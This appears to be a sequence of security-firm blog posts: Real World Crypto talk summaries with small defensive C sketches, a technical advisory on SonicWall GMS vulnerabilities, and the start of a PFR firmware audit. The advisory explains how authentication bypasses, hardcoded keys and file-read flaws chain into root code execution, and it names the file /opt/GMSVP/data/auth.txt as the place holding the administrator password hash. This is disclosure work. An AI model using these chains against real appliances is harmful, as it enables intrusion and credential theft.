A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Paillier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds while minimizing the necessary security assumptions:

  • DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
  • DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
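
The linearity of Schnorr mentioned above can be made concrete with a toy calculation. The following is only a sketch under simplifying assumptions: the modulus TOY_Q, the function names and the use of plain additive shares are all illustrative choices and are not taken from FROST or from the DKLS papers. It shows that two partial responses, each computed from one share of the nonce and one share of the key, add up to the response for the combined nonce and key.

```c
#include <assert.h>
#include <stdint.h>

/* Toy group order, chosen only so the arithmetic is easy to follow.
 * A real scheme works modulo a prime of about 256 bits. */
#define TOY_Q 1009u

/* Schnorr response s = k + e*x mod q, for nonce k, challenge e, key x. */
uint32_t schnorr_response(uint32_t k, uint32_t e, uint32_t x)
{
    assert(k < TOY_Q && e < TOY_Q && x < TOY_Q);
    uint32_t ex = (uint32_t)(((uint64_t)e * x) % TOY_Q);
    return (k + ex) % TOY_Q;
}

/* Addition modulo q, used to combine shares and partial responses. */
uint32_t add_mod_q(uint32_t a, uint32_t b)
{
    assert(a < TOY_Q && b < TOY_Q);
    return (a + b) % TOY_Q;
}
```

With nonce shares 777 and 888, key shares 123 and 456, and challenge 321, adding the two values of schnorr_response() gives the same result as calling it once on the summed nonce and summed key. ECDSA computes s = k⁻¹(h + r·x) mod q instead, which multiplies the inverted nonce by the key, so shares cannot simply be added; this is why a secure multiplication protocol is needed there.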

The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:

  • The final protocol essentially requires three messages; however, the authors found they could pipeline the messages when signing multiple messages.
  • Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
  • Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
  • One bug identified by Roy in OT extensions turned out not to apply to the DKLS implementations; however, the authors are still taking precautions and moving to SoftSpoken OT.
  • An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
  • A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.
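
The last point, unique hash prefixes per (sub)protocol instance, can be sketched as follows. This is a hedged illustration and not the DKLS encoding: the field layout, the function names put_field() and fs_oracle_input(), and the choice of 4-byte length prefixes are all assumptions. The function only builds the byte string that would then be fed to the hash function of choice; each field is length-prefixed so that two different (label, session, transcript) triples can never serialize to the same input.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Append a 4-byte big-endian length followed by the field bytes.
 * Returns the new offset, or 0 if the output buffer is too small. */
static size_t put_field(uint8_t *out, size_t cap, size_t off,
                        const void *data, size_t len)
{
    if (off > cap || cap - off < 4 || cap - off - 4 < len) {
        return 0;
    }
    if (len > 0xFFFFFFFFu) {
        return 0;   /* does not fit the 4-byte length prefix */
    }
    out[off + 0] = (uint8_t)(len >> 24);
    out[off + 1] = (uint8_t)(len >> 16);
    out[off + 2] = (uint8_t)(len >> 8);
    out[off + 3] = (uint8_t)len;
    if (len > 0) {
        memcpy(out + off + 4, data, len);
    }
    return off + 4 + len;
}

/* Build the oracle input for one (sub)protocol instance:
 * label || session id || transcript, each length-prefixed.
 * Returns the number of bytes written, or 0 on error. */
size_t fs_oracle_input(uint8_t *out, size_t cap,
                       const char *protocol_label,
                       const uint8_t *session_id, size_t sid_len,
                       const uint8_t *transcript, size_t tr_len)
{
    assert(out != NULL && protocol_label != NULL);
    size_t off = put_field(out, cap, 0, protocol_label, strlen(protocol_label));
    if (off == 0) {
        return 0;
    }
    off = put_field(out, cap, off, session_id, sid_len);
    if (off == 0) {
        return 0;
    }
    return put_field(out, cap, off, transcript, tr_len);
}
```

Without the length prefixes, the label "ab" followed by the transcript "c" would collide with the label "a" followed by "bc"; with them, the two inputs differ, so the two instances effectively query different oracles.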

The talk also discussed other gaps between theory and practice, such as session establishment: for example, whether O(n²) QR code scans are required to set up the participant set.

Aleksandar Kircanski

The Path to Real World FHE: Navigating the Ciphertext Space

Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext, yielding an encrypted result that decrypts to the same value as if the functions had been run on the plaintext. This would result in a major shift in the relationship between data privacy and data processing, as previously an application would need to decrypt the data first. FHE therefore removes the need for the decryption and re-encryption steps. This would help preserve end-to-end privacy and allow users to have additional guarantees, such as cloud providers not having access to users’ data. However, performance is a major concern, as performing computations on encrypted data using FHE remains significantly slower than performing computations on the plaintext. Key challenges for FHE include:

  • Data size expansion,
  • Speed, and
  • Usability.

The focus of the presentation was on presenting a model of FHE hierarchy of needs that included both deficiency and growth needs. FHE deficiency needs are the following:

  • FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
  • FHE Compilers and Transpilers which focus on parameter selection, optimizers and schedulers.
  • FHE Application Development which focuses on development speed, debugging and interoperability.

The next phase would be FHE growth needs:

  • FHE Systems Integration and Privacy Engineering which includes threat modeling.
  • FHE used as a critical component of privacy enhancing technologies (PETs).
  • A key current goal for FHE is to reduce the computational overhead for an entire application to demonstrate FHE’s usefulness in practical real-world settings.

Javed Samuel

High-Assurance Go Cryptography in Practice

Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more detail, specifically:

  • Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
  • Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
  • Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
  • Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrong.
  • Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
  • Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
  • Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).

An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.

Thomas Pornin

Real World Cryptography 2024

NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!

Technical Advisory – SonicWall Global Management System (GMS) & Analytics – Multiple Critical Vulnerabilities

Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass – CVE-2023-34133

Title: Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help protect against SQL Injection attacks could be bypassed.

Impact

An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.

Web Service Authentication Bypass – CVE-2023-34124

Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.

The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.

Impact

An attacker with knowledge of the authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.

Predictable Password Reset Key – CVE-2023-34123

Title: Predictable Password Reset Key
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.

An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.

Impact

An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.

CAS Authentication Bypass – CVE-2023-34137

Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.

Impact

An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.

Post-Authenticated Command Injection – CVE-2023-34127

Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.

Impact

An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Password Hash Read via Web Service – CVE-2023-34134

Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An authenticated attacker can read the administrator password hash via a web service call.

Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.

Impact

This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attacks to achieve Remote Code Execution.

Post-Authenticated Arbitrary File Read via Backup File Directory Traversal – CVE-2023-34125

Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.

Impact

An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user password hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Upload – CVE-2023-34126

Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated attacker to upload files anywhere on the system with root privileges.

Impact

An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129

Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34129
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.
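
As an illustration of the class of check whose absence leads to Zip Slip, here is a minimal sketch of an entry-name filter. It is not the vendor’s fix: the function name zip_entry_name_is_safe() is hypothetical, and the policy is deliberately conservative (it also rejects backslashes and colons, which some legitimate archives use). It does not handle symbolic links, so a real extractor would additionally need to resolve the final path and confirm that it stays under the extraction directory.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Return 1 if `name` is a relative path that cannot climb out of the
 * extraction directory, 0 otherwise. */
int zip_entry_name_is_safe(const char *name)
{
    assert(name != NULL);   /* programmer contract, not attacker input */

    if (name[0] == '\0' || name[0] == '/') {
        return 0;           /* empty or absolute path */
    }
    if (strchr(name, '\\') != NULL || strchr(name, ':') != NULL) {
        return 0;           /* Windows separators and drive prefixes */
    }

    /* Walk the '/'-separated components and reject any that is "..". */
    const char *p = name;
    while (*p != '\0') {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            return 0;
        }
        p += len;
        if (*p == '/') {
            p++;
        }
    }
    return 1;
}
```

An extractor would call this on every entry name before joining it to the destination directory, and abort the whole extraction on the first rejected name rather than skipping it silently.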

Impact

An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135

Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier 
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service method allows an authenticated user to read arbitrary files from the underlying file system.

Impact

A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing. For example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.

Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132

Title: Client-Side Hashing Function Allows Pass-the-Hash
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The client-side hashing algorithm used during the logon was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.

Impact

An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.

Hardcoded Tomcat Credentials (Privilege Escalation) – CVE-2023-34128

Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.

Impact

An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as a local privilege escalation vector in the case where an attacker has gained low privileged access to the OS (e.g., via the postgres user or snwlcli users).

Unauthenticated File Upload – CVE-2023-34136

Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.

Impact

Whilst the location of the upload is not controllable by the attacker, this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.

Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).

Unauthenticated Sensitive Information Leak – CVE-2023-34131

Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of pages were found to not require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could be later used by an attacker as a prerequisite for further attacks.

Impact

An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.

Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130

Title: Use of Outdated Cryptographic Algorithm with Hardcoded Key
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block cipher which suffers from known weaknesses. Its use is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).

Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.

Impact

An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.

Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-08-24

Written by:  Richard Warren

LeaPFRogging PFR Implementations

Back in October of 2022, this announcement by AMI caught my eye. AMI has contributed a product named “Tektagon Open Edition” to the Open Compute Project (OCP). 

Tektagon OpenEdition is an open-source Platform Root of Trust (PRoT) solution with foundational firmware security features that detect platform firmware corruption, recover the firmware and protect firmware integrity. With its open-source code, Tektagon OpenEdition™ augments transparency, resulting in high-quality code […] 

I decided to dig in and audit the recently open sourced code. But first, some background: Tektagon is a hardware root-of-trust (HRoT) that implements Intel PFR 2.0. So… What exactly is PFR? 

Platform Firmware Resiliency 

PFR, or Platform Firmware Resiliency, is a standard defined by everyone’s favorite standards body, NIST, in SP 800-193. The specification describes guidelines that support the resiliency of platform firmware and data against destructive attacks or unauthorized changes. These security properties are upheld by a new HRoT device that implements the PFR logic. 

At its core, PFR acknowledges that in addition to the boot firmware (e.g., the BIOS), a platform contains numerous other peripheral devices which execute firmware and therefore also require integrity verification. Examples of these peripherals typically include GPUs, network cards, storage controllers, display controllers, and so on. Many of these peripherals are highly privileged (e.g., DMA capable), and so they are attractive targets for an attacker. It is important that their firmware images are protected from tampering. That is, if an attacker could compromise one of these peripherals by tampering with its firmware, they might be able to: 

  1. Achieve persistence on the platform across reboots.
  2. Pivot towards compromising other more highly privileged firmware components.  
  3. Violate multi-tenant isolation and confidentiality expectations in cloud environments. 

Although these motivations sound like they are centered around only protecting the integrity of the platform firmware and its data assets, the SP 800-193 specification also describes how PFR is crucial for protecting firmware availability. Here, availability refers to the ability to recover from corrupted flash storage, which might occur due to a failed firmware update, or perhaps, cosmic rays that cause bit flips in flash.

In the PFR specification, these security requirements appear as three guiding principles:  

  1. Protection: How authenticity and integrity of firmware and data should be upheld. 
  2. Detection: How to detect when firmware or data integrity has been violated.  
  3. Recovery: How to restore the platform to a known good state.  

This is a somewhat crowded technology space. In addition to AMI’s Tektagon product, many other vendors have created their own PFR (or PFR-like) solutions whose purpose is to help assure device firmware authenticity and availability, further complicating the already complex x86 system boot process. Examples include Microsoft’s Project Cerberus which is used in Azure, Intel PFR, Google Titan, Lattice’s Root of Trust FPGA solution, and more. 

PFR Attack Surfaces 

PFR introduces a new device, a microcontroller or FPGA, that positions itself as the man-in-the-middle on the flash memory SPI bus. By sitting on the bus, PFR chipsets can interpose all bus transactions. Whenever a device (such as the Board Management Controller (BMC) or Platform Controller Hub (PCH)) reads or writes SPI flash, the PFR chipset proxies that request. This grants PFR the crucial responsibility of verifying the authenticity and integrity of all code and data that resides in the persistent storage media. 

A simplified block diagram of a typical PFR solution

However, by interposing buses in this manner, PFR exposes itself to a rather large attack surface. It must read, parse, and verify various binary blobs (firmware and data) that exist in flash. Such parsing can be a tedious and delicate process. If the code is not written defensively (a challenge for even the best C programmers) then memory safety violations may arise. Another concern is race conditions such as time-of-check-time-of-use (TOCTOU) or double fetch problems. 
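
To make the double fetch concern concrete, here is a small sketch of the defensive pattern. It is not taken from Tektagon: the blob layout (a 2-byte little-endian length followed by the payload), the MAX_PAYLOAD limit and the function name copy_payload_once() are all hypothetical. The point is that the length field is read from the shared buffer exactly once, into a local variable, and that the same local value is both validated and used, so whoever controls the underlying memory cannot change it between the check and the copy.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_PAYLOAD 256u

/* Copy the payload of a length-prefixed blob into `out`.
 * Returns 0 on success and sets *out_len, or -1 if the blob is malformed. */
int copy_payload_once(const volatile uint8_t *blob, size_t blob_size,
                      uint8_t *out, size_t out_cap, size_t *out_len)
{
    assert(blob != NULL && out != NULL && out_len != NULL);

    if (blob_size < 2) {
        return -1;          /* too short to hold the length field */
    }

    /* Single fetch: the length is read once and kept in a local. */
    size_t len = (size_t)blob[0] | ((size_t)blob[1] << 8);

    /* Validate the local copy against every bound that matters. */
    if (len > MAX_PAYLOAD || len > out_cap || len > blob_size - 2) {
        return -1;
    }

    /* Use the same local copy; the header is never re-read. */
    for (size_t i = 0; i < len; i++) {
        out[i] = blob[2 + i];
    }
    *out_len = len;
    return 0;
}
```

The vulnerable variant would check blob[0] and blob[1] in one statement and then read them again to size the copy. The payload bytes themselves can still change while they are being copied, so anything that is later verified (a signature, for example) should be verified on the private copy in `out`, not on the original buffer.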

